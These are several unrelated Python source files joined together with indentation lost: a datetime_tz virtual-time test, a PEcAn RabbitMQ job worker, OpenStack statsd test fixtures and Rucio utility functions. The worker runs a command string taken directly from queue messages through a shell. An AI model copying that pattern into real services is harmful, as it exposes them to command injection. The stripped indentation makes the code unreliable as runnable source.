assert isinstance(start_tz, datetime_tz.datetime_tz)
local_start_tz = datetime_tz.localize(start_tz)
assert local_start_tz == now
assert isinstance(local_start_tz, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.min, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.max, datetime_tz.datetime_tz)
virtualtime.enable()
now = datetime_tz.datetime_tz.now()
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime_tz.datetime_tz)
later = now + datetime.timedelta(hours=1)
assert isinstance(later, datetime.datetime)
assert isinstance(later, datetime_tz.datetime_tz)
start = datetime.datetime.combine(now.date(), now.time())
assert isinstance(start, datetime.datetime)
local_start = datetime_tz.localize(start)
assert local_start == now
assert isinstance(local_start, datetime_tz.datetime_tz)
start_tz = datetime_tz.datetime_tz.combine(now.date(), now.time(), datetime_tz.localtz())
assert isinstance(start_tz, datetime_tz.datetime_tz)
local_start_tz = datetime_tz.localize(start_tz)
assert local_start_tz == now
assert isinstance(local_start_tz, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.min, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.max, datetime_tz.datetime_tz)
_original_datetime_module = virtualtime._original_datetime_module
_original_datetime_type = virtualtime._original_datetime_type
_original_datetime_now = virtualtime._original_datetime_now
_original_datetime_utcnow = virtualtime._original_datetime_utcnow
_time_offset = virtualtime._time_offset
class virtual_datetime_tz_offset (virtualtime.virtual_datetime):
@classmethod
def now(cls, tz=None):
"""Virtualized datetime.datetime.now()"""
return super(virtual_datetime_tz_offset, cls).now()
@classmethod
def utcnow(cls):
"""Virtualized datetime.datetime.utcnow()"""
tz = getattr(datetime.datetime, "localtz_override") or datetime_tz.localtz()
now = super(virtual_datetime_tz_offset, cls).now()
#print now.replace(tzinfo=tz), tz.utcoffset(now.replace(tzinfo=tz))
#print "utcnow", tz.localize(now).utcoffset()
return now - tz.localize(now).utcoffset()
_original_vt_module = datetime.datetime
def patch_vt_module():
"""Patches the datetime module to work on virtual time"""
datetime.datetime.now = virtual_datetime_tz_offset.now
datetime.datetime.utcnow = virtual_datetime_tz_offset.utcnow
def unpatch_vt_module():
"""Restores the datetime module to work on real time"""
datetime.datetime.now = _original_vt_module.now
datetime.datetime.utcnow = _original_vt_module.utcnow
class TestVirtualDatetimeOffset:
def setup(self):
virtualtime.enable()
datetime.datetime.localtz_override = pytz.timezone("America/Chicago")
patch_vt_module()
test_datetime_tz.patch_datetime_module()
def teardown(self):
virtualtime.disable()
datetime.datetime.localtz_override = None
unpatch_vt_module()
test_datetime_tz.unpatch_datetime_module()
def test_offset(self):
"""Make sure the offset is correct when using the localtz override"""
localdatetime = datetime.datetime(2014,03,9,1,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014,03,9,2,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014,03,9,3,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014,11,2,0,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014,11,2,1,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014,11,2,2,45,0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
#print datetime_tz.datetime_tz.now(), datetime.datetime.now()
#print datetime_tz.datetime_tz.utcnow(), datetime.datetime.utcnow()
def runTests(self,localdatetime):
tz = datetime.datetime.localtz_override
print "now"
assert self.close_enough(datetime.datetime.now(), localdatetime)
utcnow = datetime_tz.datetime_tz.utcnow()
print "utcnow"
assert self.close_enough(utcnow, tz.localize(localdatetime))
now = datetime_tz.datetime_tz.now()
print "_tznow"
assert self.close_enough(now, tz.localize(localdatetime))
def close_enough(self,dt,dt1):
print dt,"\t", dt1
return (dt - dt1) < datetime.timedelta(seconds=1)
|
executor.py
|
import json
import logging
import os
import socket
import subprocess
import sys
import threading
import time
import uuid
import pika
import shutil
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@rabbitmq/%2F')
rabbitmq_queue = os.getenv('RABBITMQ_QUEUE', 'pecan')
default_application = os.getenv('APPLICATION', 'job.sh')
class Worker:
def __init__(self, method, properties, body):
self.method = method
self.properties = properties
self.body = body
self.finished = False
def runfunc(self):
logging.debug(self.body)
jbody = json.loads(self.body.decode('UTF-8'))
folder = jbody.get('folder')
rebuild = jbody.get('rebuild')
pecan_xml = jbody.get('pecan_xml')
custom_application = jbody.get('custom_application')
if rebuild is not None:
logging.info("Rebuilding PEcAn with make")
application = 'make'
folder = '/pecan'
elif pecan_xml is not None:
# Passed entire pecan XML as a string
logging.info("Running XML passed directly")
try:
os.mkdir(folder)
except OSError as e:
logging.info("Caught the following OSError. ",
"If it's just that the directory exists, ",
"this can probably be ignored: ", e)
workflow_path = os.path.join(folder, "workflow.R")
shutil.copyfile("/work/workflow.R", workflow_path)
xml_file = open(os.path.join(folder, "pecan.xml"), "w")
xml_file.write(pecan_xml)
xml_file.close()
# Set variables for execution
application = "R CMD BATCH workflow.R"
elif custom_application is not None:
application = custom_application
else:
logging.info("Running default command: %s" % default_application)
application = default_application
logging.info("Running command: %s" % application)
logging.info("Starting command in directory %s." % folder)
try:
output = subprocess.check_output(application, stderr=subprocess.STDOUT, shell=True, cwd=folder)
status = 'OK'
except subprocess.CalledProcessError as e:
logging.exception("Error running job.")
output = e.output
status = 'ERROR'
except Exception as e:
logging.exception("Error running job.")
output = str(e)
status = 'ERROR'
logging.info("Finished running job with status " + status)
logging.info(output)
try:
with open(os.path.join(folder, 'rabbitmq.out'), 'w') as out:
out.write(str(output) + "\n")
out.write(status + "\n")
except Exception:
logging.exception("Error writing status.")
# done processing, set finished to true
self.finished = True
# called for every message, this will start the program and ack message if all is ok.
def callback(ch, method, properties, body):
global worker
# do not pass channel, pika is not threadsafe, only receiver is allowed to use channel
worker = Worker(method, properties, body)
thread = threading.Thread(target=worker.runfunc)
thread.start()
# connect to rabbitmq and receive jobs, only this function can use the channel.
def receiver():
global worker
# create connection to rabbitmq
connection = pika.BlockingConnection(pika.URLParameters(rabbitmq_uri))
channel = connection.channel()
# make sure queue exists
channel.queue_declare(queue=rabbitmq_queue, durable=True)
# receive 1 message at a time, call callback function
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=rabbitmq_queue)
# receive messages
worker = None
logging.info('[*] Waiting for messages. To exit press CTRL+C')
try:
while True:
# use polling to allow for heartbeats, the actual work is done
# in another thread which should not talk in channel!
channel.connection.process_data_events(time_limit=1) # 1 second
if worker and worker.finished:
channel.basic_ack(delivery_tag=worker.method.delivery_tag)
worker = None
except KeyboardInterrupt:
pass
finally:
connection.close()
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
# start listening for new jobs
receiver()
|
test_stats.py
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2014 OpenStack Foundation
# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import pprint
import threading
import time
import select
import socket
import fixtures
import prometheus_client
import testtools.content
from openstack.tests.unit import base
class StatsdFixture(fixtures.Fixture):
def _setUp(self):
self.running = True
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('', 0))
self.port = self.sock.getsockname()[1]
self.wake_read, self.wake_write = os.pipe()
self.stats = []
self.thread.start()
self.addCleanup(self._cleanup)
def run(self):
while self.running:
poll = select.poll()
poll.register(self.sock, select.POLLIN)
poll.register(self.wake_read, select.POLLIN)
ret = poll.poll()
for (fd, event) in ret:
if fd == self.sock.fileno():
data = self.sock.recvfrom(1024)
if not data:
return
self.stats.append(data[0])
if fd == self.wake_read:
return
def _cleanup(self):
self.running = False
os.write(self.wake_write, b'1\n')
self.thread.join()
class TestStats(base.TestCase):
def setUp(self):
self.statsd = StatsdFixture()
self.useFixture(self.statsd)
# note, use 127.0.0.1 rather than localhost to avoid getting ipv6
# see: https://github.com/jsocol/pystatsd/issues/61
self.useFixture(
fixtures.EnvironmentVariable('STATSD_HOST', '127.0.0.1'))
self.useFixture(
fixtures.EnvironmentVariable('STATSD_PORT', str(self.statsd.port)))
self.add_info_on_exception('statsd_content', self.statsd.stats)
# Set up the above things before the super setup so that we have the
# environment variables set when the Connection is created.
super(TestStats, self).setUp()
self._registry = prometheus_client.CollectorRegistry()
self.cloud.config._collector_registry = self._registry
self.addOnException(self._add_prometheus_samples)
def _add_prometheus_samples(self, exc_info):
samples = []
for metric in self._registry.collect():
for s in metric.samples:
samples.append(s)
self.addDetail(
'prometheus_samples',
testtools.content.text_content(pprint.pformat(samples)))
def assert_reported_stat(self, key, value=None, kind=None):
"""Check statsd output
Check statsd return values. A ``value`` should specify a
``kind``, however a ``kind`` may be specified without a
``value`` for a generic match. Leave both empy to just check
for key presence.
:arg str key: The statsd key
:arg str value: The expected value of the metric ``key``
:arg str kind: The expected type of the metric ``key`` For example
- ``c`` counter
- ``g`` gauge
- ``ms`` timing
- ``s`` set
"""
self.assertIsNotNone(self.statsd)
if value:
self.assertNotEqual(kind, None)
start = time.time()
while time.time() < (start + 1):
# Note our fake statsd just queues up results in a queue.
# We just keep going through them until we find one that
# matches, or fail out. If statsd pipelines are used,
# large single packets are sent with stats separated by
# newlines; thus we first flatten the stats out into
# single entries.
stats = itertools.chain.from_iterable(
[s.decode('utf-8').split('\n') for s in self.statsd.stats])
for stat in stats:
k, v = stat.split(':')
if key == k:
if kind is None:
# key with no qualifiers is found
return True
s_value, s_kind = v.split('|')
# if no kind match, look for other keys
if kind != s_kind:
continue
if value:
# special-case value|ms because statsd can turn
# timing results into float of indeterminate
# length, hence foiling string matching.
if kind == 'ms':
if float(value) == float(s_value):
return True
if value == s_value:
return True
# otherwise keep looking for other matches
continue
# this key matches
return True
time.sleep(0.1)
raise Exception("Key %s not found in reported stats" % key)
def assert_prometheus_stat(self, name, value, labels=None):
sample_value = self._registry.get_sample_value(name, labels)
self.assertEqual(sample_value, value)
def test_list_projects(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
self.cloud.list_projects()
self.assert_calls()
self.assert_reported_stat(
'openstack.api.identity.GET.projects', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='identity',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_projects(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
list(self.cloud.identity.projects())
self.assert_calls()
self.assert_reported_stat(
'openstack.api.identity.GET.projects', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='identity',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_servers(self):
mock_uri = 'https://compute.example.com/v2.1/servers/detail'
self.register_uris([
self.get_nova_discovery_mock_dict(),
dict(method='GET', uri=mock_uri, status_code=200,
json={'servers': []})])
list(self.cloud.compute.servers())
self.assert_calls()
self.assert_reported_stat(
'openstack.api.compute.GET.servers.detail', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='compute',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_servers_no_detail(self):
mock_uri = 'https://compute.example.com/v2.1/servers'
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'servers': []})])
self.cloud.compute.get('/servers')
self.assert_calls()
self.assert_reported_stat(
'openstack.api.compute.GET.servers', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='compute',
endpoint=mock_uri,
method='GET',
status_code='200'))
class TestNoStats(base.TestCase):
def setUp(self):
super(TestNoStats, self).setUp()
self.statsd = StatsdFixture()
self.useFixture(self.statsd)
def test_no_stats(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
self.cloud.identity._statsd_client = None
list(self.cloud.identity.projects())
self.assert_calls()
self.assertEqual([], self.statsd.stats)
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2021
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2021
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope":"scope", "name","name"}
:returns: list of dictionaries {"scope":"scope", "name","name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'r+b') as f:
# memory map the file
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(list_, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(list_), n):
yield list_[i:i + n]
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def _register_policy_package_surl_algorithms():
def try_importing_policy(vo=None):
import importlib
try:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo['vo']))
module = importlib.import_module(package)
if hasattr(module, 'get_surl_algorithms'):
surl_algorithms = module.get_surl_algorithms()
if not vo:
_SURL_ALGORITHMS.update(surl_algorithms)
else:
# check that the names are correctly prefixed
for k in surl_algorithms.keys():
if k.lower().startswith(vo['vo'].lower()):
_SURL_ALGORITHMS[k] = surl_algorithms[k]
else:
raise InvalidAlgorithmName(k, vo['vo'])
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
from rucio.core.vo import list_vos
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy()
else:
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(vo)
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
_register_policy_package_surl_algorithms()
_loaded_policy_modules = True
